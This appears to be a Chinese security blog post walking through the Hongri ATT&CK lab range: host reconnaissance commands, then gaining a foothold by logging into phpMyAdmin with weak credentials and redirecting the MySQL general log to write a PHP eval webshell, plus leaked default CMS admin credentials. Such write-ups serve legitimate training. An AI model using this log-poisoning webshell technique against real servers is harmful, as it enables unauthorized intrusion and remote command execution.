<!DOCTYPE html>
<html lang=en>
<head>
    <!-- so meta -->
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="HandheldFriendly" content="True">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=5" />
    <meta name="description" content="当我们获取到立足点后，下一步便是内网渗透 内网渗透入门&amp;&amp;兼红日ATT＆CK系列靶场（一）   信息收集 硬件信息收集 123wmic cpu get name, numberofcores, numberoflogicalprocessors 查看CPU信息wmic path win32_videocontroller get name  查看显卡信息wmic disk">
<meta property="og:type" content="article">
<meta property="og:title" content="内网渗透从0到1-[超多知识点]-[未完待续]">
<meta property="og:url" content="http://example.com/2024/11/10/%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F%E4%BB%8E0%E5%88%B01-[%E8%B6%85%E5%A4%9A%E7%9F%A5%E8%AF%86%E7%82%B9]-[%E6%9C%AA%E5%AE%8C%E5%BE%85%E7%BB%AD]/index.html">
<meta property="og:site_name" content="Plazx&#39;s Blog">
<meta property="og:description" content="当我们获取到立足点后，下一步便是内网渗透 内网渗透入门&amp;&amp;兼红日ATT＆CK系列靶场（一）   信息收集 硬件信息收集 123wmic cpu get name, numberofcores, numberoflogicalprocessors 查看CPU信息wmic path win32_videocontroller get name  查看显卡信息wmic disk">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2024/png/40918973/1731223152055-db2ddbbb-fbad-4fdf-9ca1-9bcd56eeeb10.png">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2024/png/40918973/1731223548662-cfbc6802-70c0-46c7-bb8a-ac640601b1e6.png">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2024/png/40918973/1731225013489-4db2a022-84be-48db-8faa-bc44a91cfe9b.png">
<meta property="article:published_time" content="2024-11-10T12:00:00.000Z">
<meta property="article:modified_time" content="2024-11-10T08:30:51.317Z">
<meta property="article:author" content="Plazx">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://cdn.nlark.com/yuque/0/2024/png/40918973/1731223152055-db2ddbbb-fbad-4fdf-9ca1-9bcd56eeeb10.png">
    
    
      
        
          <link rel="shortcut icon" href="/images/favicon.ico">
        
      
      
        
          <link rel="icon" type="image/png" href="/images/favicon-192x192.png" sizes="192x192">
        
      
      
        
          <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png">
        
      
    
    <!-- title -->
    <title>内网渗透从0到1-[超多知识点]-[未完待续]</title>
    <!-- async scripts -->
    <!-- Google Analytics -->


    <!-- Umami Analytics -->


    <!-- styles -->
    
<link rel="stylesheet" href="/css/style.css">

    <!-- persian styles -->
    
    <!-- rss -->
    
    
	<!-- mathjax -->
	
<meta name="generator" content="Hexo 7.3.0"></head>

<body class="max-width mx-auto px3 ltr">
    
      <div id="header-post">
  <a id="menu-icon" href="#" aria-label="Menu"><i class="fa-solid fa-bars fa-lg"></i></a>
  <a id="menu-icon-tablet" href="#" aria-label="Menu"><i class="fa-solid fa-bars fa-lg"></i></a>
  <a id="top-icon-tablet" href="#" aria-label="Top" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');" style="display:none;"><i class="fa-solid fa-chevron-up fa-lg"></i></a>
  <span id="menu">
    <span id="nav">
      <ul>
        <!--
       --><li><a href="/">Home</a></li><!--
     --><!--
       --><li><a href="/about/">About</a></li><!--
     --><!--
       --><li><a href="/archives/">Writing</a></li><!--
     --><!--
       --><li><a target="_blank" rel="noopener" href="http://github.com/NekoSec">Projects</a></li><!--
     --><!--
       --><li><a href="/links/">Friend Links</a></li><!--
     -->
      </ul>
    </span>
    <br/>
    <span id="actions">
      <ul>
        
        <li><a class="icon" aria-label="Previous post" href="/2024/11/12/Xss%E4%BB%8E0%E5%88%B01&&Xss-labs%5B1-20%5D/"><i class="fa-solid fa-chevron-left" aria-hidden="true" onmouseover="$('#i-prev').toggle();" onmouseout="$('#i-prev').toggle();"></i></a></li>
        
        
        <li><a class="icon" aria-label="Next post" href="/2024/11/10/%E6%88%91%E7%9A%84%E7%AC%AC%E4%B8%80%E7%AF%87%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1%E6%96%87%E7%AB%A0-%5B%E6%9C%AA%E5%AE%8C%E5%BE%85%E7%BB%AD%5D/"><i class="fa-solid fa-chevron-right" aria-hidden="true" onmouseover="$('#i-next').toggle();" onmouseout="$('#i-next').toggle();"></i></a></li>
        
        <li><a class="icon" aria-label="Back to top" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fa-solid fa-chevron-up" aria-hidden="true" onmouseover="$('#i-top').toggle();" onmouseout="$('#i-top').toggle();"></i></a></li>
        <li><a class="icon" aria-label="Share post" href="#"><i class="fa-solid fa-share-alt" aria-hidden="true" onmouseover="$('#i-share').toggle();" onmouseout="$('#i-share').toggle();" onclick="$('#share').toggle();return false;"></i></a></li>
      </ul>
      <span id="i-prev" class="info" style="display:none;">Previous post</span>
      <span id="i-next" class="info" style="display:none;">Next post</span>
      <span id="i-top" class="info" style="display:none;">Back to top</span>
      <span id="i-share" class="info" style="display:none;">Share post</span>
    </span>
    <br/>
    <div id="share" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=http://example.com/2024/11/10/%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F%E4%BB%8E0%E5%88%B01-[%E8%B6%85%E5%A4%9A%E7%9F%A5%E8%AF%86%E7%82%B9]-[%E6%9C%AA%E5%AE%8C%E5%BE%85%E7%BB%AD]/"><i class="fab fa-facebook " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=http://example.com/2024/11/10/%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F%E4%BB%8E0%E5%88%B01-[%E8%B6%85%E5%A4%9A%E7%9F%A5%E8%AF%86%E7%82%B9]-[%E6%9C%AA%E5%AE%8C%E5%BE%85%E7%BB%AD]/&text=内网渗透从0到1-[超多知识点]-[未完待续]"><i class="fab fa-twitter " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=http://example.com/2024/11/10/%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F%E4%BB%8E0%E5%88%B01-[%E8%B6%85%E5%A4%9A%E7%9F%A5%E8%AF%86%E7%82%B9]-[%E6%9C%AA%E5%AE%8C%E5%BE%85%E7%BB%AD]/&title=内网渗透从0到1-[超多知识点]-[未完待续]"><i class="fab fa-linkedin " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=http://example.com/2024/11/10/%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F%E4%BB%8E0%E5%88%B01-[%E8%B6%85%E5%A4%9A%E7%9F%A5%E8%AF%86%E7%82%B9]-[%E6%9C%AA%E5%AE%8C%E5%BE%85%E7%BB%AD]/&is_video=false&description=内网渗透从0到1-[超多知识点]-[未完待续]"><i class="fab fa-pinterest " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=内网渗透从0到1-[超多知识点]-[未完待续]&body=Check out this article: http://example.com/2024/11/10/%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F%E4%BB%8E0%E5%88%B01-[%E8%B6%85%E5%A4%9A%E7%9F%A5%E8%AF%86%E7%82%B9]-[%E6%9C%AA%E5%AE%8C%E5%BE%85%E7%BB%AD]/"><i class="fa-solid fa-envelope " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=http://example.com/2024/11/10/%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F%E4%BB%8E0%E5%88%B01-[%E8%B6%85%E5%A4%9A%E7%9F%A5%E8%AF%86%E7%82%B9]-[%E6%9C%AA%E5%AE%8C%E5%BE%85%E7%BB%AD]/&title=内网渗透从0到1-[超多知识点]-[未完待续]"><i class="fab fa-get-pocket " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=http://example.com/2024/11/10/%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F%E4%BB%8E0%E5%88%B01-[%E8%B6%85%E5%A4%9A%E7%9F%A5%E8%AF%86%E7%82%B9]-[%E6%9C%AA%E5%AE%8C%E5%BE%85%E7%BB%AD]/&title=内网渗透从0到1-[超多知识点]-[未完待续]"><i class="fab fa-reddit " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=http://example.com/2024/11/10/%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F%E4%BB%8E0%E5%88%B01-[%E8%B6%85%E5%A4%9A%E7%9F%A5%E8%AF%86%E7%82%B9]-[%E6%9C%AA%E5%AE%8C%E5%BE%85%E7%BB%AD]/&title=内网渗透从0到1-[超多知识点]-[未完待续]"><i class="fab fa-stumbleupon " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=http://example.com/2024/11/10/%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F%E4%BB%8E0%E5%88%B01-[%E8%B6%85%E5%A4%9A%E7%9F%A5%E8%AF%86%E7%82%B9]-[%E6%9C%AA%E5%AE%8C%E5%BE%85%E7%BB%AD]/&title=内网渗透从0到1-[超多知识点]-[未完待续]"><i class="fab fa-digg " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=http://example.com/2024/11/10/%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F%E4%BB%8E0%E5%88%B01-[%E8%B6%85%E5%A4%9A%E7%9F%A5%E8%AF%86%E7%82%B9]-[%E6%9C%AA%E5%AE%8C%E5%BE%85%E7%BB%AD]/&name=内网渗透从0到1-[超多知识点]-[未完待续]&description="><i class="fab fa-tumblr " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=http://example.com/2024/11/10/%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F%E4%BB%8E0%E5%88%B01-[%E8%B6%85%E5%A4%9A%E7%9F%A5%E8%AF%86%E7%82%B9]-[%E6%9C%AA%E5%AE%8C%E5%BE%85%E7%BB%AD]/&t=内网渗透从0到1-[超多知识点]-[未完待续]"><i class="fab fa-hacker-news " aria-hidden="true"></i></a></li>
</ul>

    </div>
    
    
      <div id="toc">
        <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#Zy5bH"><span class="toc-number">1.</span> <span class="toc-text">信息收集</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#srWpU"><span class="toc-number">1.1.</span> <span class="toc-text">硬件信息收集</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#XzKL1"><span class="toc-number">1.2.</span> <span class="toc-text">网络信息收集&amp;&amp;软收集</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#SCFXL"><span class="toc-number">2.</span> <span class="toc-text">红日ATT＆CK系列靶场（一）</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#YHOUq"><span class="toc-number">2.1.</span> <span class="toc-text">网络拓扑图</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#fRPoR"><span class="toc-number">2.2.</span> <span class="toc-text">外网打点</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#hiOju"><span class="toc-number">2.2.1.</span> <span class="toc-text">Getshell-1-mysql日志写shell</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#A7Xe1"><span class="toc-number">2.2.2.</span> <span class="toc-text">Getshell-2-后台配置文件写shell</span></a></li></ol></li></ol></li></ol>
      </div>
    
  </span>
</div>

    
    <div class="content index py4 ">
        
        <article class="post h-entry" itemscope itemtype="http://schema.org/BlogPosting">
  <header>
    
    <h1 class="posttitle p-name" itemprop="name headline">
        内网渗透从0到1-[超多知识点]-[未完待续]
    </h1>



    <div class="meta">
      <span class="author p-author h-card" itemprop="author" itemscope itemtype="http://schema.org/Person">
        <span class="p-name" itemprop="name">Plazx</span>
      </span>
      
    <div class="postdate">
      
        <time datetime="2024-11-10T12:00:00.000Z" class="dt-published" itemprop="datePublished">2024-11-10</time>
        
      
    </div>


      

      

    </div>
  </header>
  

  <div class="content e-content" itemprop="articleBody">
    <meta name="referrer" content="no-referrer" />



<blockquote>
<p>当我们获取到立足点后，下一步便是内网渗透</p>
<p>内网渗透入门&amp;&amp;兼红日ATT＆CK系列靶场（一）</p>
</blockquote>
<hr>
<h1 id="Zy5bH">信息收集</h1>
<h2 id="srWpU">硬件信息收集</h2>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">wmic cpu get name, numberofcores, numberoflogicalprocessors 查看CPU信息</span><br><span class="line">wmic path win32_videocontroller get name  查看显卡信息</span><br><span class="line">wmic diskdrive get model, size  查看硬盘信息</span><br></pre></td></tr></table></figure>

<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">lscpu 查看CPU信息</span><br><span class="line">lspci | grep -i vga 查看显卡信息</span><br><span class="line">df -h 查看硬盘信息</span><br></pre></td></tr></table></figure>

<h2 id="XzKL1">网络信息收集&&软收集</h2>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">tasklist /SVC 查看系统进程并且查询杀软 https://av.aabyss.cn/index.php</span><br><span class="line"></span><br><span class="line">env (linux) 查看环境变量</span><br><span class="line"><span class="built_in">set</span> (windows-cmd) /// Get-ChildItem Env: / gci Env: (windows-powershell) 查看环境变量</span><br><span class="line">甚至在ctf中，flag会在环境变量中以键值对的形式存在，特别注意这一个</span><br><span class="line"></span><br><span class="line">systeminfo 查看主机名、Os名称、版本、域、时区、输入法、网卡、补丁</span><br></pre></td></tr></table></figure>



<h1 id="SCFXL">红日ATT＆CK系列靶场（一）</h1>
<h2 id="YHOUq">网络拓扑图</h2>
<h2 id="fRPoR">外网打点</h2>
Fscan/dirsearch信息收集

<p><img src="https://cdn.nlark.com/yuque/0/2024/png/40918973/1731223152055-db2ddbbb-fbad-4fdf-9ca1-9bcd56eeeb10.png"></p>
<p><img src="https://cdn.nlark.com/yuque/0/2024/png/40918973/1731223548662-cfbc6802-70c0-46c7-bb8a-ac640601b1e6.png"></p>
<p>进入80端口，发现<font style="color:rgb(68, 68, 68);">phpStudy 探针泄露绝对路径以及</font>弱口令root:root，目录扫描发现phpmyadmin，直接进入</p>
<h3 id="hiOju">Getshell-1-mysql日志写shell</h3>
原理是一旦开启日志功能，并且将日志地址改为webshell的地址，我们所执行的sql语句会被插入到日志中，这时候只需要执行查询webshell即可

<p>前提1.必须是dba权限 2.知道绝对路径</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">show variables like <span class="string">&#x27;%general%&#x27;</span>; 查看是否开启写日志以及日志写入路径</span><br><span class="line"><span class="built_in">set</span> <span class="keyword">global</span> general_log = on; 开启写日志</span><br><span class="line"><span class="built_in">set</span> <span class="keyword">global</span> general_log_file = <span class="string">&#x27;C:/phpStudy/WWW/1.php&#x27;</span>; 设置日志写入路径</span><br><span class="line">select <span class="string">&#x27;&lt;?php eval($_POST[cmd])?&gt;&#x27;</span>; 写shell</span><br><span class="line">访问 <span class="number">192.168</span><span class="number">.92</span><span class="number">.128</span>/<span class="number">1.</span>php 即可</span><br></pre></td></tr></table></figure>

<p><img src="https://cdn.nlark.com/yuque/0/2024/png/40918973/1731225013489-4db2a022-84be-48db-8faa-bc44a91cfe9b.png"></p>
<h3 id="A7Xe1">Getshell-2-后台配置文件写shell</h3>
进入phpmyadmin后，我们发现一个数据库newyxcms，猜测可能存在目录yxcms,果然存在

<blockquote>
<p>P.S. 这里我没想到猜测目录，看到了别的大佬打的站才想出来，不得不说自己的思路还是太窄了</p>
</blockquote>
<p>首页发现信息泄露</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">公告信息</span><br><span class="line">本站为YXcms的默认演示模板，YXcms是一款基于PHP+MYSQL构建的高效网站管理系统。 </span><br><span class="line">后台地址请在网址后面加上/index.php?r=admin进入。 </span><br><span class="line">后台的用户名:admin;密码:<span class="number">123456</span>，请进入后修改默认密码。</span><br></pre></td></tr></table></figure>

<p><a target="_blank" rel="noopener" href="http://192.168.92.128/yxcms/index.php?r=admin">http://192.168.92.128/yxcms/index.php?r=admin</a> 进入</p>

  </div>
</article>



        
          <div id="footer-post-container">
  <div id="footer-post">

    <div id="nav-footer" style="display: none">
      <ul>
        
          <li><a href="/">Home</a></li>
        
          <li><a href="/about/">About</a></li>
        
          <li><a href="/archives/">Writing</a></li>
        
          <li><a target="_blank" rel="noopener" href="http://github.com/NekoSec">Projects</a></li>
        
          <li><a href="/links/">Friend Links</a></li>
        
      </ul>
    </div>

    
    
      <div id="toc-footer" style="display: none">
        <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#Zy5bH"><span class="toc-number">1.</span> <span class="toc-text">信息收集</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#srWpU"><span class="toc-number">1.1.</span> <span class="toc-text">硬件信息收集</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#XzKL1"><span class="toc-number">1.2.</span> <span class="toc-text">网络信息收集&amp;&amp;软收集</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#SCFXL"><span class="toc-number">2.</span> <span class="toc-text">红日ATT＆CK系列靶场（一）</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#YHOUq"><span class="toc-number">2.1.</span> <span class="toc-text">网络拓扑图</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#fRPoR"><span class="toc-number">2.2.</span> <span class="toc-text">外网打点</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#hiOju"><span class="toc-number">2.2.1.</span> <span class="toc-text">Getshell-1-mysql日志写shell</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#A7Xe1"><span class="toc-number">2.2.2.</span> <span class="toc-text">Getshell-2-后台配置文件写shell</span></a></li></ol></li></ol></li></ol>
      </div>
    

    <div id="share-footer" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=http://example.com/2024/11/10/%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F%E4%BB%8E0%E5%88%B01-[%E8%B6%85%E5%A4%9A%E7%9F%A5%E8%AF%86%E7%82%B9]-[%E6%9C%AA%E5%AE%8C%E5%BE%85%E7%BB%AD]/"><i class="fab fa-facebook fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=http://example.com/2024/11/10/%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F%E4%BB%8E0%E5%88%B01-[%E8%B6%85%E5%A4%9A%E7%9F%A5%E8%AF%86%E7%82%B9]-[%E6%9C%AA%E5%AE%8C%E5%BE%85%E7%BB%AD]/&text=内网渗透从0到1-[超多知识点]-[未完待续]"><i class="fab fa-twitter fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=http://example.com/2024/11/10/%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F%E4%BB%8E0%E5%88%B01-[%E8%B6%85%E5%A4%9A%E7%9F%A5%E8%AF%86%E7%82%B9]-[%E6%9C%AA%E5%AE%8C%E5%BE%85%E7%BB%AD]/&title=内网渗透从0到1-[超多知识点]-[未完待续]"><i class="fab fa-linkedin fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=http://example.com/2024/11/10/%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F%E4%BB%8E0%E5%88%B01-[%E8%B6%85%E5%A4%9A%E7%9F%A5%E8%AF%86%E7%82%B9]-[%E6%9C%AA%E5%AE%8C%E5%BE%85%E7%BB%AD]/&is_video=false&description=内网渗透从0到1-[超多知识点]-[未完待续]"><i class="fab fa-pinterest fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=内网渗透从0到1-[超多知识点]-[未完待续]&body=Check out this article: http://example.com/2024/11/10/%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F%E4%BB%8E0%E5%88%B01-[%E8%B6%85%E5%A4%9A%E7%9F%A5%E8%AF%86%E7%82%B9]-[%E6%9C%AA%E5%AE%8C%E5%BE%85%E7%BB%AD]/"><i class="fa-solid fa-envelope fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=http://example.com/2024/11/10/%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F%E4%BB%8E0%E5%88%B01-[%E8%B6%85%E5%A4%9A%E7%9F%A5%E8%AF%86%E7%82%B9]-[%E6%9C%AA%E5%AE%8C%E5%BE%85%E7%BB%AD]/&title=内网渗透从0到1-[超多知识点]-[未完待续]"><i class="fab fa-get-pocket fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=http://example.com/2024/11/10/%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F%E4%BB%8E0%E5%88%B01-[%E8%B6%85%E5%A4%9A%E7%9F%A5%E8%AF%86%E7%82%B9]-[%E6%9C%AA%E5%AE%8C%E5%BE%85%E7%BB%AD]/&title=内网渗透从0到1-[超多知识点]-[未完待续]"><i class="fab fa-reddit fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=http://example.com/2024/11/10/%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F%E4%BB%8E0%E5%88%B01-[%E8%B6%85%E5%A4%9A%E7%9F%A5%E8%AF%86%E7%82%B9]-[%E6%9C%AA%E5%AE%8C%E5%BE%85%E7%BB%AD]/&title=内网渗透从0到1-[超多知识点]-[未完待续]"><i class="fab fa-stumbleupon fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=http://example.com/2024/11/10/%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F%E4%BB%8E0%E5%88%B01-[%E8%B6%85%E5%A4%9A%E7%9F%A5%E8%AF%86%E7%82%B9]-[%E6%9C%AA%E5%AE%8C%E5%BE%85%E7%BB%AD]/&title=内网渗透从0到1-[超多知识点]-[未完待续]"><i class="fab fa-digg fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=http://example.com/2024/11/10/%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F%E4%BB%8E0%E5%88%B01-[%E8%B6%85%E5%A4%9A%E7%9F%A5%E8%AF%86%E7%82%B9]-[%E6%9C%AA%E5%AE%8C%E5%BE%85%E7%BB%AD]/&name=内网渗透从0到1-[超多知识点]-[未完待续]&description="><i class="fab fa-tumblr fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=http://example.com/2024/11/10/%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F%E4%BB%8E0%E5%88%B01-[%E8%B6%85%E5%A4%9A%E7%9F%A5%E8%AF%86%E7%82%B9]-[%E6%9C%AA%E5%AE%8C%E5%BE%85%E7%BB%AD]/&t=内网渗透从0到1-[超多知识点]-[未完待续]"><i class="fab fa-hacker-news fa-lg" aria-hidden="true"></i></a></li>
</ul>

    </div>

    <div id="actions-footer">
        <a id="menu" class="icon" href="#" onclick="$('#nav-footer').toggle();return false;"><i class="fa-solid fa-bars fa-lg" aria-hidden="true"></i> Menu</a>
        
          <a id="toc" class="icon" href="#" onclick="$('#toc-footer').toggle();return false;"><i class="fa-solid fa-list fa-lg" aria-hidden="true"></i> TOC</a>
        
        <a id="share" class="icon" href="#" onclick="$('#share-footer').toggle();return false;"><i class="fa-solid fa-share-alt fa-lg" aria-hidden="true"></i> Share</a>
        <a id="top" style="display:none" class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fa-solid fa-chevron-up fa-lg" aria-hidden="true"></i> Top</a>
    </div>

  </div>
</div>

        
        <footer id="footer">
  <div class="footer-left">
    Copyright &copy;
    
    
    2024-2077
    Plazx
  </div>
  <div class="footer-right">
    <nav>
      <ul>
        <!--
       --><li><a href="/">Home</a></li><!--
     --><!--
       --><li><a href="/about/">About</a></li><!--
     --><!--
       --><li><a href="/archives/">Writing</a></li><!--
     --><!--
       --><li><a target="_blank" rel="noopener" href="http://github.com/NekoSec">Projects</a></li><!--
     --><!--
       --><li><a href="/links/">Friend Links</a></li><!--
     -->
      </ul>
    </nav>
  </div>
</footer>

    </div>
    <!-- styles -->



  <link rel="preload" as="style" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.min.css" crossorigin="anonymous" onload="this.onload=null;this.rel='stylesheet'"/>


    <!-- jquery -->

  <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.js" crossorigin="anonymous"></script>




<!-- clipboard -->

  
    <script src="https://cdnjs.cloudflare.com/ajax/libs/clipboard.js/2.0.7/clipboard.min.js" crossorigin="anonymous"></script>
  
  <script type="text/javascript">
  $(function() {
    // copy-btn HTML
    var btn = "<span class=\"btn-copy tooltipped tooltipped-sw\" aria-label=\"Copy to clipboard!\">";
    btn += '<i class="fa-regular fa-clone"></i>';
    btn += '</span>';
    // mount it!
    $(".highlight table").before(btn);
    var clip = new ClipboardJS('.btn-copy', {
      text: function(trigger) {
        return Array.from(trigger.nextElementSibling.querySelectorAll('.code')).reduce((str,it)=>str+it.innerText+'\n','')
      }
    });
    clip.on('success', function(e) {
      e.trigger.setAttribute('aria-label', "Copied!");
      e.clearSelection();
    })
  })
  </script>


<script src="/js/main.js"></script>

<!-- search -->

<!-- Baidu Analytics -->

  <script type="text/javascript">
        var _hmt = _hmt || [];
        (function() {
          var hm = document.createElement("script");
          hm.src = "https://hm.baidu.com/hm.js?4d0e9f82e790a82153825a1c24f344dc";
          var s = document.getElementsByTagName("script")[0];
          s.parentNode.insertBefore(hm, s);
        })();
        </script>

<!-- Cloudflare Analytics -->

<!-- Disqus Comments -->

<!-- utterances Comments -->

</body>
</html>
